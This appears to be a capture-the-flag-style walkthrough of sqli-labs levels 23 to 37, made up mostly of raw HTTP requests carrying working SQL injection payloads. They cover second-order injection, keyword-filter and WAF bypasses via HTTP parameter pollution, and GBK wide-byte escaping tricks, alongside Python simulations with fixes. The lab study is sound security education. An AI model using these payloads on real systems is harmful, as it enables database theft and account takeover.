Less-23 Error Based- no comments

Reading the source shows that comment sequences are filtered out, so instead of ending the payload with a comment, the trailing quote is balanced with and '1'='1 and the error-based extraction goes through updatexml():

QQ截图20220622150427.jpg

GET /Less-23/?id=1' and updatexml(1,concat('^',(select database()),'^'),1) and '1'='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220622150510.jpg

Less-24 - Second Degree Injections

  • The goal is second-order injection: first register a user named admin'#, then use that stored username, through the password-change function, to change another user's password. mysqli_real_escape_string only protects the INSERT at registration; the stored value admin'# is later concatenated into the UPDATE unescaped.

QQ截图20220622154007.jpg

  • Then log in as this user

QQ截图20220622154026.jpg

  • Then simply change the password; the stored username closes the quote and comments out the rest of the WHERE clause, so the UPDATE hits the admin account

QQ截图20220622154133.jpg

# SQL statement that is actually executed
UPDATE users SET PASSWORD='2' where username='admin'#' and password='1'
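The whole Less-24 flow, as an added example (not the lab's code or the original write-up): registration escapes the username, the stored value is later trusted, and a parameterised UPDATE is shown as the fix. It runs on sqlite3 so it works offline; SQLite has no # comment, so the attacker registers admin'-- instead of admin'# (on MySQL the page's admin'# behaves the same). The table layout, the seeded admin row and the quote-doubling escape() standing in for mysqli_real_escape_string are assumptions.

```python
"""Second-order SQL injection (sqli-labs Less-24 style), simulated with sqlite3.

Added example, not lab code. Escaping at registration protects that INSERT,
but the password-change handler later takes the username from the session
and concatenates it unescaped into an UPDATE. SQLite has no '#' comment, so
the demo registers admin'-- instead of admin'#; the mechanism is identical.
"""
import sqlite3


def escape(s):
    """Quote doubling, standing in for mysqli_real_escape_string (assumption)."""
    return s.replace("'", "''")


def setup():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'secret')")  # constructed victim row
    return db


def register(db, username, password):
    # Escaped: the quote inside the username is stored literally, exactly as typed.
    db.execute(f"INSERT INTO users VALUES ('{escape(username)}', '{escape(password)}')")


def login(db, username, password):
    """Returns the stored username that becomes $_SESSION['username'] (assumption)."""
    row = db.execute("SELECT username FROM users WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None


def change_password_vulnerable(db, session_user, current, new):
    # No escaping here: the session value is trusted because it "came from the DB".
    sql = (f"UPDATE users SET password='{new}' "
           f"WHERE username='{session_user}' AND password='{current}'")
    db.execute(sql)
    return sql


def change_password_fixed(db, session_user, current, new):
    # Parameterised: the stored quote and comment are just data.
    db.execute("UPDATE users SET password=? WHERE username=? AND password=?",
               (new, session_user, current))


def password_of(db, username):
    return db.execute("SELECT password FROM users WHERE username=?",
                      (username,)).fetchone()[0]


def demo(fixed=False):
    """Returns (admin's password, attacker's password) after the password change."""
    db = setup()
    register(db, "admin'-- ", "1")
    user = login(db, "admin'-- ", "1")   # session now holds admin'--
    if fixed:
        change_password_fixed(db, user, "1", "2")
    else:
        change_password_vulnerable(db, user, "1", "2")
    return password_of(db, "admin"), password_of(db, "admin'-- ")


if __name__ == "__main__":
    print("vulnerable:", demo())          # admin's password becomes '2'
    print("fixed:     ", demo(fixed=True))  # only the attacker's own row changes
```

In the vulnerable path the executed statement is UPDATE users SET password='2' WHERE username='admin'-- ' AND password='1', the SQLite counterpart of the MySQL statement above. The lesson is that "escaped on the way in" says nothing about how a value is used later; every query that concatenates data must escape it at that point, or better, use parameters everywhere.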

Less-25 Trick with OR & AND

GET /Less-25/?id=-1' union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622155351.jpg

GET /Less-25/?id=-1' || updatexml(1,concat('^',(select database()),'^'),1) || '1'='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622155740.jpg

After auditing the code, the most direct bypass is double-writing: the filter removes or and and only once, so anandd is reduced to and.

GET /Less-25/?id=-1' anandd updatexml(1,concat('^',(select database()),'^'),1) anandd '1'='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622171630.jpg

Less-25a Trick with OR & AND Blind

GET /Less-25a/?id=-1 union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622160141.jpg

Less-26 Trick with comments

GET /Less-26/?id=-1'||updatexml(1,concat('^',database(),'^'),1)||'1  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

Less-26a Trick with comments

GET /Less-26a/?id=-1')anandd(if((length(database())=8),sleep(5),1))anandd('1  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622171122.jpg

QQ截图20220622171146.jpg

The same probe can be turned into a boolean test, judged by whether the page still shows a result. This works even though the request says id=-1, because this level's filter also strips every - character, so the value that reaches the query is 1, an existing row: when the condition is true the and 0 hides it, when false the row is shown.

GET /Less-26a/?id=-1')anandd(if((length(database())=8),0,1))anandd('1  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622171350.jpg

QQ截图20220622171406.jpg

Less-27 Trick with SELECT & UNION

Keyword filters can be bypassed by nesting the keyword several times: here union is stripped once, so uniunionon is enough, but select is stripped twice, so it needs ssselectelectelect. Spaces are stripped as well, so a newline (%0a) stands in for them.

QQ截图20220623143246.jpg

GET /Less-27/?id=0'%0auniunionon%0assselectelectelect%0a1,version(),database()%0a'1 #--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623143302.jpg

Mixed case also works, because the patterns are matched only in a few fixed spellings rather than case-insensitively:

GET /Less-27/?id=0'%0aUniOn%0aSelEct%0a1,version(),database()%0a'1 #--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623143825.jpg

Less-27a Trick with SELECT & UNION

GET /Less-27a/?id=100"%0aUniOn%0aSelEct%0a11,version(),database()%0a"1  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623145603.jpg

Less-28 Trick with SELECT & UNION

The filter is /union\s+select/i, so inserting all between the two keywords breaks the pattern while union all select remains valid SQL. Spaces are still stripped, so %0a separates the tokens as before.

QQ截图20220623150307.jpg

GET /Less-28/?id=1000')%0aUniOn%0aall%0aSelEct%0a11,version(),concat('^',database(),'^  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623150337.jpg
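The four blacklist() functions of Less-25 through Less-28 re-implemented in Python, as an added example (not the lab's PHP and not part of the original write-up), with the payloads from the requests above run through them. The regex chains are reconstructed from the lab's source as the author remembers it and should be treated as an assumption; check them against your own copy. The point is to see why each bypass has the shape it has, and what else the filters break.

```python
"""Blacklist filters of sqli-labs Less-25 to Less-28, re-implemented in Python.

Added example, not the lab's code: the rules below are reconstructed from the
lab's PHP blacklist() functions (preg_replace calls applied in this order) and
should be treated as an assumption; check them against your copy of the source.
"""
import re

# (pattern, flags) pairs, applied in order with re.sub(pattern, "", payload)
FILTERS = {
    # Less-25/25a: OR and AND removed once, case-insensitively
    25: [(r"or", re.I), (r"and", re.I)],
    # Less-26/26a: also comment starters, the '-' itself, every whitespace char and slashes
    26: [(r"or", re.I), (r"and", re.I), (r"[/*]", 0), (r"-", 0), (r"#", 0),
         (r"\s", 0), (r"[/\\]", 0)],
    # Less-27/27a: comment starters, space and '+', then union/select in fixed spellings
    # (lowercase select is removed twice, lowercase union once, no /i flag)
    27: [(r"[/*]", 0), (r"-", 0), (r"#", 0), (r"[ +]", 0),
         (r"select", 0), (r"[ +]", 0), (r"union", 0), (r"select", 0),
         (r"UNION", 0), (r"SELECT", 0), (r"Union", 0), (r"Select", 0)],
    # Less-28/28a: only the exact sequence union<whitespace>select is removed
    28: [(r"[/*]", 0), (r"-", 0), (r"#", 0), (r"[ +]", 0), (r"union\s+select", re.I)],
}


def blacklist(level, payload):
    """Apply the level's filter chain and return what reaches the SQL query."""
    for pattern, flags in FILTERS[level]:
        payload = re.sub(pattern, "", payload, flags=flags)
    return payload


def keeps(level, payload, *keywords):
    """True if every keyword survives filtering (compared case-insensitively)."""
    out = blacklist(level, payload).lower()
    return all(k.lower() in out for k in keywords)


# Payloads taken from the requests above, URL-decoded; '\n' stands for %0a.
PAYLOADS = {
    25: "-1' anandd updatexml(1,concat('^',(select database()),'^'),1) anandd '1'='1",
    26: "-1')anandd(if((length(database())=8),sleep(5),1))anandd('1",
    27: "0'\nuniunionon\nssselectelectelect\n1,version(),database()\n'1 #-- ",
    28: "1000')\nUniOn\nall\nSelEct\n11,version(),concat('^',database(),'^",
}

if __name__ == "__main__":
    for level, p in PAYLOADS.items():
        print(f"Less-{level}: {blacklist(level, p)!r}")
    # The OR/AND filter of Less-25/26 mangles identifiers too: these need double-writing as well.
    print(blacklist(25, "information_schema"), blacklist(25, "password"))
```

Two things worth noticing when running it: on Less-25 and Less-26 the same filter turns information_schema into infmation_schema and password into passwd, so column and schema names must be double-written too (infoorrmation_schema); and on Less-27 a double-written sselectelect is reduced to nothing, which is why the request above triples it.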

Less-28a Trick with SELECT & UNION

GET /Less-28a/?id=1000')%0aUniOn%0aall%0aSelEct%0a11,version(),concat('^',database(),'^  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623150422.jpg

Less-29-31

QQ截图20220623151757.jpg

  • The server side has two tiers: the first is a JSP server with Tomcat as its engine, the second a PHP server with Apache as its engine, and the PHP server is the one that actually serves the web content. The flow is: the client reaches the Tomcat server directly, and Tomcat in turn requests the data from the Apache server. Responses travel back the opposite way.

  • A brief note on building the environment, which in my case was Ubuntu 14.04. Three things are needed: the Tomcat server, a JDK, and mysql-connector-java. Install each; note that after installing the JDK its path must be exported into the environment, and the mysql-connector-java jar must be copied into the relevant JDK directory. Then unzip tomcat-files.zip into Tomcat's webapps/ROOT directory. The paths and the MySQL username/password in the source must be corrected for your setup.

  • Key question: for index.php?id=1&id=2, is the data for id=1 or for id=2 displayed?

QQ截图20220623151857.jpg

  • Consider the request index.jsp?id=1&id=2 against the server configuration in the first screenshot: the client request first passes through Tomcat, which parses the first parameter; Tomcat then requests the Apache (PHP) server, which parses the last parameter. Which parameter determines what is finally returned to the client?
  • Answer: the content for id=2, because the server actually providing the service is the Apache (PHP) server, and the data returned is what Apache processed. Two-tier setups like this exist in real deployments, and the reason is that filtering and pre-processing of data is often done at the Tomcat tier, where it acts much like a WAF. Precisely because the two tiers parse parameters differently, the difference can be used to get past the WAF's checks. This is one application of HPP (HTTP Parameter Pollution), and HPP can threaten both servers and clients.
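The two parsing behaviours described in the bullets above, as an added example that is not part of the lab or the original write-up: a Tomcat-style front tier (getParameter() returns the first value of a repeated parameter) applying a WAF rule, and a PHP-style back tier ($_GET keeps the last value) building the Less-29 query. The WAF rule, the query template and the hardened strict_value() helper are assumptions.

```python
"""HTTP Parameter Pollution across a two-tier deployment (added example, not lab code).

Java/Tomcat: getParameter() returns the FIRST value of a repeated parameter.
PHP: $_GET keeps the LAST value. A WAF on the front tier therefore inspects a
different 'id' than the one the PHP tier puts into its query.
"""
import re
from urllib.parse import parse_qs, urlsplit

NUMERIC = re.compile(r"-?\d+")

# Constructed requests against the lab host used in the captures above.
DIRECT = "http://192.168.50.10:83/Less-29/?id=-1' union select 1,version(),database()--+"
POLLUTED = "http://192.168.50.10:83/Less-29/?id=1&id=-1' union select 1,version(),database()--+"


def values(query, name):
    """All values of `name`, in order, with %xx and '+' decoded like a web server does."""
    return parse_qs(query, keep_blank_values=True).get(name, [])


def tomcat_value(query, name):
    """Servlet semantics: first occurrence wins."""
    v = values(query, name)
    return v[0] if v else None


def php_value(query, name):
    """PHP semantics: last occurrence wins."""
    v = values(query, name)
    return v[-1] if v else None


def waf_allows(query):
    """Front-tier rule (assumed): 'id' must be an integer."""
    v = tomcat_value(query, "id")
    return v is not None and NUMERIC.fullmatch(v) is not None


def backend_sql(query):
    """Less-29-style query built by the PHP tier from the value it sees."""
    return f"SELECT * FROM users WHERE id='{php_value(query, 'id')}' LIMIT 0,1"


def handle(url):
    """Whole chain: returns 'blocked' or the SQL the backend would execute."""
    query = urlsplit(url).query
    if not waf_allows(query):
        return "blocked"
    return backend_sql(query)


def strict_value(query, name):
    """Hardened variant (assumption): refuse the request when a parameter is
    repeated, so the two tiers cannot disagree about which value was checked."""
    v = values(query, name)
    if len(v) != 1:
        raise ValueError(f"parameter {name!r} must appear exactly once, got {len(v)}")
    return v[0]


if __name__ == "__main__":
    print(handle(DIRECT))    # blocked: the WAF sees the injected value
    print(handle(POLLUTED))  # passes: the WAF checks id=1, PHP executes the second id
```

The fix is not a better regex but a consistent parsing policy: either reject repeated parameters at the edge, as strict_value() does, or make the WAF evaluate every occurrence of a parameter rather than only the first.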

Less-29 Protection with WAF

By default there is no outer Tomcat tier, so the request reaches the PHP server directly and the injection works as-is:

GET /Less-29/?id=-1' union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623152059.jpg

Less-30 Protection with WAF

Again without the outer Tomcat tier, the request goes straight to PHP; only the quoting changes to double quotes:

GET /Less-30/?id=-1" union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623152219.jpg

Less-31 FUN with WAF

Same setup without the Tomcat tier; here the parameter is wrapped in ("...") so the payload closes both:

GET /Less-31/?id=-1") union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623152301.jpg

Less-32 Bypass addslashes()

  • Usually a Chinese character occupies 2 bytes in GBK and 3 bytes in UTF-8. In PHP this can be checked with echo strlen("和"); it prints 2 when the file is saved as GBK and 3 when saved as UTF-8.
  • Wide-byte injection exploits a MySQL property: when the connection uses GBK, MySQL treats two bytes as one Chinese character whenever the first byte is above 0x80 (the GBK lead-byte range is 0x81-0xFE). If we put %df in front of the single quote, addslashes() inserts a backslash (%5c) before the quote; %df%5c is a valid two-byte GBK character, so the backslash is absorbed into it and the quote escapes unescaped into the query.

GET /Less-32/?id=-1%df' union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623155622.jpg
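The byte-level mechanism behind Less-32 through Less-37, as an added example (not lab code and not part of the original write-up): a naive addslashes()-style escaper beside a GBK-aware one, and a small model of the server lexer reading a single-quoted literal under character_set_client=gbk. The page's ?id=-1%df' payload is embedded URL-decoded. The lexer model, the query template and the escaping details are simplifications and should be read as assumptions; the aware escaper models what MySQL's client library does once it knows the connection charset (mysqli_set_charset('gbk') rather than a bare SET NAMES gbk): a lead byte that is not followed by a valid trail byte is itself escaped.

```python
"""Wide-byte (GBK) injection modelled on raw bytes (added example, not lab code).

addslashes() and a charset-unaware mysql_real_escape_string() put 0x5C in front
of 0x27 byte by byte. Under GBK a byte in 0x81-0xFE followed by one in
0x40-0xFE (except 0x7F) is one two-byte character, so the server reads
0xDF 0x5C as a single character and the quote behind it is left unescaped.
"""

SPECIAL = {0x00: b"\\0", 0x27: b"\\'", 0x22: b'\\"', 0x5C: b"\\\\",
           0x0A: b"\\n", 0x0D: b"\\r", 0x1A: b"\\Z"}


def is_lead(b):
    return 0x81 <= b <= 0xFE


def is_trail(b):
    return 0x40 <= b <= 0xFE and b != 0x7F


def escape_naive(data):
    """addslashes()-style: every special byte gets a backslash, no charset knowledge."""
    return b"".join(SPECIAL.get(b, bytes([b])) for b in data)


def escape_gbk_aware(data):
    """Charset-aware: complete GBK characters pass untouched, orphan lead bytes are escaped."""
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if is_lead(b) and i + 1 < len(data) and is_trail(data[i + 1]):
            out += data[i:i + 2]          # valid two-byte character: copy as is
            i += 2
        elif is_lead(b):
            out += b"\\" + bytes([b])     # lone lead byte: escape it so it cannot swallow the next 0x5C
            i += 1
        else:
            out += SPECIAL.get(b, bytes([b]))
            i += 1
    return bytes(out)


def read_literal_gbk(sql):
    """Model of the server lexer reading a single-quoted literal with character_set_client=gbk.
    `sql` must start at the opening quote; returns (literal bytes, remainder of the statement)."""
    if sql[:1] != b"'":
        raise ValueError("expected opening quote")
    i, lit = 1, bytearray()
    while i < len(sql):
        b = sql[i]
        if is_lead(b) and i + 1 < len(sql) and is_trail(sql[i + 1]):
            lit += sql[i:i + 2]           # two bytes, one character: a 0x5C trail byte is NOT an escape here
            i += 2
        elif b == 0x5C and i + 1 < len(sql):
            lit.append(sql[i + 1])        # backslash escape: next byte is taken literally
            i += 2
        elif b == 0x27:
            return bytes(lit), sql[i + 1:]  # closing quote
        else:
            lit.append(b)
            i += 1
    raise ValueError("unterminated string literal")


PAYLOAD = b"-1\xdf' union select 1,version(),database()-- "  # the page's ?id=-1%df' payload, URL-decoded


def build_query(escaper, user_input=PAYLOAD):
    return b"SELECT * FROM users WHERE id='" + escaper(user_input) + b"' LIMIT 0,1"


def what_the_server_sees(escaper):
    """Split the built query into the string literal and whatever follows it."""
    sql = build_query(escaper)
    return read_literal_gbk(sql[sql.index(b"'"):])


if __name__ == "__main__":
    for esc in (escape_naive, escape_gbk_aware):
        literal, rest = what_the_server_sees(esc)
        print(esc.__name__, literal, rest)
```

With the naive escaper the literal ends after 0xDF 0x5C and the remainder begins with " union select ...", which is the injection; with the aware escaper the remainder is just " LIMIT 0,1" and the whole payload, quote included, stays inside the string. This is why the byte values matter more than the function name: Less-32 (addslashes) and Less-36 (mysql_real_escape_string without a charset set on the connection) fall to the same %df' trick.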

Less-33 Bypass addslashes()

GET /Less-33/?id=-1%df' union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623160654.jpg

Less-34- Bypass Add SLASHES

POST /Less-34/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 78
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-34/?id=-1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

uname=Dumb1%df' union select version(),database()--+&passwd=1111&submit=Submit

QQ截图20220623161202.jpg

Less-35 why care for addslashes()

GET /Less-35/?id=-1 union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623161640.jpg

Less-36 Bypass MySQL Real Escape String

GET /Less-36/?id=-1%df' union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623162329.jpg

Less-37- MySQL_real_escape_string

POST /Less-37/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 78
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-37/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

uname=Dumb1%df' union select version(),database()--+&passwd=1111&submit=Submit

QQ截图20220623162501.jpg